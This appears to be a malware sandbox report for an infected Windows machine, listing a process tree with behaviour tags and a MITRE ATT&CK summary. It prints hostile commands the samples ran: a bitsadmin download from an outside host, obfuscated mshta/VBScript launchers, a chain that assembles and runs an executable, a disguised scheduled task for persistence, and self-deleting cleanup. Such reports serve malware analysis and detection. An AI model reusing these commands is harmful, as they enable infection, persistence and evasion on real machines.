C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10872 -s 11048⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:3364
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nmsxayna.ide\installer.exe /qn CAMPAIGN="654" & exit6⤵PID:10536
-
C:\Users\Admin\AppData\Local\Temp\nmsxayna.ide\installer.exeC:\Users\Admin\AppData\Local\Temp\nmsxayna.ide\installer.exe /qn CAMPAIGN="654"7⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:10844 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\nmsxayna.ide\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\nmsxayna.ide\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1634654229 /qn CAMPAIGN=""654"" " CAMPAIGN="654"8⤵PID:9236
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jiwhzcb2.5m1\any.exe & exit6⤵PID:10724
-
C:\Users\Admin\AppData\Local\Temp\jiwhzcb2.5m1\any.exeC:\Users\Admin\AppData\Local\Temp\jiwhzcb2.5m1\any.exe7⤵PID:5948
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vh2xfrlo.yoh\gcleaner.exe /mixfive & exit6⤵PID:11080
-
C:\Users\Admin\AppData\Local\Temp\vh2xfrlo.yoh\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\vh2xfrlo.yoh\gcleaner.exe /mixfive7⤵PID:3160
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 6528⤵
- Program crash
PID:836
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 6648⤵
- Program crash
PID:5000
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 6688⤵
- Program crash
PID:5452
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 6928⤵
- Program crash
PID:4104
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 8968⤵
- Program crash
PID:5844
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xpj401wj.ryl\autosubplayer.exe /S & exit6⤵PID:5636
-
C:\Users\Admin\AppData\Local\Temp\xpj401wj.ryl\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\xpj401wj.ryl\autosubplayer.exe /S7⤵
- Loads dropped DLL
- Drops file in Program Files directory
PID:5092 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscB3EE.tmp\tempfile.ps1"8⤵PID:6704
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscB3EE.tmp\tempfile.ps1"8⤵PID:9956
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscB3EE.tmp\tempfile.ps1"8⤵PID:3116
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscB3EE.tmp\tempfile.ps1"8⤵PID:5764
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscB3EE.tmp\tempfile.ps1"8⤵PID:4320
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscB3EE.tmp\tempfile.ps1"8⤵PID:7056
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscB3EE.tmp\tempfile.ps1"8⤵PID:8012
-
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z8⤵
- Download via BitsAdmin
PID:1608
-
-
-
-
-
-
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Suspicious use of SetThreadContext
PID:1256 -
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
- Modifies registry class
PID:4928
-
-
C:\Users\Admin\AppData\Local\Temp\D6EA.exeC:\Users\Admin\AppData\Local\Temp\D6EA.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5520 -
C:\Users\Admin\AppData\Local\Temp\D6EA.exeC:\Users\Admin\AppData\Local\Temp\D6EA.exe2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:4236
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:5200 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
- Modifies registry class
PID:4444
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:11200
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:5324
-
C:\Users\Admin\AppData\Local\Temp\8098.exeC:\Users\Admin\AppData\Local\Temp\8098.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4408
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:6136
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
PID:5252 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 9A6D1137993DA64ED093E2361D8701B5 C2⤵
- Loads dropped DLL
PID:5172
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding B8FCEAEA1DAC8ACA52FBE7D6B3CBCAD92⤵PID:9804
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
PID:10008
-
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 743003C93FDE6B2810161A792732A30B E Global\MSI00002⤵PID:7032
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
PID:4200
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:6328
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:6664 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:6692
-
-
C:\Users\Admin\AppData\Local\Temp\EAFC.exeC:\Users\Admin\AppData\Local\Temp\EAFC.exe1⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:6672
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6652
-
C:\Users\Admin\AppData\Local\Temp\F0D9.exeC:\Users\Admin\AppData\Local\Temp\F0D9.exe1⤵PID:6900
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:7280
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:7484
-
C:\Users\Admin\AppData\Local\Temp\54D3.exeC:\Users\Admin\AppData\Local\Temp\54D3.exe1⤵PID:9380
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"2⤵PID:9932
-
-
C:\Users\Admin\AppData\Local\Temp\AE7D.exeC:\Users\Admin\AppData\Local\Temp\AE7D.exe1⤵PID:7088
-
C:\Users\Admin\AppData\Local\Temp\AE7D.exeC:\Users\Admin\AppData\Local\Temp\AE7D.exe2⤵PID:7172
-
C:\Users\Admin\AppData\Local\Temp\Haemotoxic.exe"C:\Users\Admin\AppData\Local\Temp\Haemotoxic.exe"3⤵PID:4292
-
-
-
C:\Users\Admin\AppData\Local\Temp\B804.exeC:\Users\Admin\AppData\Local\Temp\B804.exe1⤵PID:7316
-
C:\Users\Admin\AppData\Local\Temp\F472.exeC:\Users\Admin\AppData\Local\Temp\F472.exe1⤵PID:6072
-
C:\Users\Admin\AppData\Local\Temp\F472.exeC:\Users\Admin\AppData\Local\Temp\F472.exe2⤵PID:3200
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\e068daeb-125f-4ef9-9112-39c934523eba" /deny *S-1-1-0:(OI)(CI)(DE,DC)3⤵
- Modifies file permissions
PID:8700
-
-
C:\Users\Admin\AppData\Local\Temp\F472.exe"C:\Users\Admin\AppData\Local\Temp\F472.exe" --Admin IsNotAutoStart IsNotTask3⤵PID:1956
-
C:\Users\Admin\AppData\Local\Temp\F472.exe"C:\Users\Admin\AppData\Local\Temp\F472.exe" --Admin IsNotAutoStart IsNotTask4⤵PID:5300
-
C:\Users\Admin\AppData\Local\88e9d3be-f20b-4cb0-8fa0-dfa65a65fb30\build2.exe"C:\Users\Admin\AppData\Local\88e9d3be-f20b-4cb0-8fa0-dfa65a65fb30\build2.exe"5⤵PID:4412
-
C:\Users\Admin\AppData\Local\88e9d3be-f20b-4cb0-8fa0-dfa65a65fb30\build2.exe"C:\Users\Admin\AppData\Local\88e9d3be-f20b-4cb0-8fa0-dfa65a65fb30\build2.exe"6⤵PID:5072
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\88e9d3be-f20b-4cb0-8fa0-dfa65a65fb30\build2.exe" & del C:\ProgramData\*.dll & exit7⤵PID:11136
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im build2.exe /f8⤵
- Kills process with taskkill
PID:6504
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 68⤵
- Delays execution with timeout.exe
PID:6560
-
-
-
-
-
C:\Users\Admin\AppData\Local\88e9d3be-f20b-4cb0-8fa0-dfa65a65fb30\build3.exe"C:\Users\Admin\AppData\Local\88e9d3be-f20b-4cb0-8fa0-dfa65a65fb30\build3.exe"5⤵PID:6192
-
C:\Users\Admin\AppData\Local\88e9d3be-f20b-4cb0-8fa0-dfa65a65fb30\build3.exe"C:\Users\Admin\AppData\Local\88e9d3be-f20b-4cb0-8fa0-dfa65a65fb30\build3.exe"6⤵PID:6288
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"7⤵
- Creates scheduled task(s)
PID:10704
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\FABC.exeC:\Users\Admin\AppData\Local\Temp\FABC.exe1⤵PID:4872
-
C:\Users\Admin\AppData\Local\Temp\FBB7.exeC:\Users\Admin\AppData\Local\Temp\FBB7.exe1⤵PID:8792
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im FBB7.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\FBB7.exe" & del C:\ProgramData\*.dll & exit2⤵PID:11160
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im FBB7.exe /f3⤵
- Kills process with taskkill
PID:10004
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 63⤵
- Delays execution with timeout.exe
PID:2584
-
-
-
C:\Users\Admin\AppData\Local\Temp\FE0A.exeC:\Users\Admin\AppData\Local\Temp\FE0A.exe1⤵PID:8848
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBSCRipt:clOSe( creaTEObJecT ("WsCRiPT.sheLL"). RUN( "C:\Windows\system32\cmd.exe /r cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\FE0A.exe"" wND_P0R7CSA.EXe && STArT wND_P0R7CSA.ExE /p4nbpeM1nqd~Rrsm~Y & iF """" == """" for %N IN ( ""C:\Users\Admin\AppData\Local\Temp\FE0A.exe"" ) do taskkill -IM ""%~NxN"" /f " , 0 , TrUe ) )2⤵PID:9088
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /r cOpY /Y "C:\Users\Admin\AppData\Local\Temp\FE0A.exe" wND_P0R7CSA.EXe && STArT wND_P0R7CSA.ExE /p4nbpeM1nqd~Rrsm~Y & iF "" == "" for %N IN ( "C:\Users\Admin\AppData\Local\Temp\FE0A.exe" ) do taskkill -IM "%~NxN" /f3⤵PID:9268
-
C:\Windows\SysWOW64\taskkill.exetaskkill -IM "FE0A.exe" /f4⤵
- Kills process with taskkill
PID:7248
-
-
C:\Users\Admin\AppData\Local\Temp\wND_P0R7CSA.EXewND_P0R7CSA.ExE /p4nbpeM1nqd~Rrsm~Y4⤵PID:9440
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBSCRipt:clOSe( creaTEObJecT ("WsCRiPT.sheLL"). RUN( "C:\Windows\system32\cmd.exe /r cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\wND_P0R7CSA.EXe"" wND_P0R7CSA.EXe && STArT wND_P0R7CSA.ExE /p4nbpeM1nqd~Rrsm~Y & iF ""/p4nbpeM1nqd~Rrsm~Y "" == """" for %N IN ( ""C:\Users\Admin\AppData\Local\Temp\wND_P0R7CSA.EXe"" ) do taskkill -IM ""%~NxN"" /f " , 0 , TrUe ) )5⤵PID:9632
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /r cOpY /Y "C:\Users\Admin\AppData\Local\Temp\wND_P0R7CSA.EXe" wND_P0R7CSA.EXe && STArT wND_P0R7CSA.ExE /p4nbpeM1nqd~Rrsm~Y & iF "/p4nbpeM1nqd~Rrsm~Y " == "" for %N IN ( "C:\Users\Admin\AppData\Local\Temp\wND_P0R7CSA.EXe" ) do taskkill -IM "%~NxN" /f6⤵PID:9708
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBScRiPt:cLose (cReateOBjECt ( "wscript.ShElL" ). RUN ("CmD /c eCHO radmC:\Users\Admin\AppData\Local\TemprEl> 60EI.1 & ecHO | seT /P = ""MZ"" > OuVq.r &coPy /y /B OUVQ.R + NLmf_.Y + yT1Q99t.5 + 60Ei.1 NxXhJc.D & sTARt msiexec /y .\NXXHJC.d &deL NlMf_.Y YT1Q99t.5 60Ei.1 OuVq.r " , 0 , tRue ))5⤵PID:7104
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c eCHO radmC:\Users\Admin\AppData\Local\TemprEl> 60EI.1 & ecHO | seT /P = "MZ" > OuVq.r &coPy /y /B OUVQ.R + NLmf_.Y + yT1Q99t.5 + 60Ei.1 NxXhJc.D& sTARt msiexec /y .\NXXHJC.d &deL NlMf_.Y YT1Q99t.5 60Ei.1 OuVq.r6⤵PID:8992
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>OuVq.r"7⤵PID:9992
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ecHO "7⤵PID:6740
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec /y .\NXXHJC.d7⤵PID:9952
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\FFC0.exeC:\Users\Admin\AppData\Local\Temp\FFC0.exe1⤵PID:8884
Network
MITRE ATT&CK Enterprise v6
Persistence
BITS Jobs
1Modify Existing Service
2Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
BITS Jobs
1Disabling Security Tools
1File and Directory Permissions Modification
1Install Root Certificate
1Modify Registry
4Virtualization/Sandbox Evasion
1Web Service
1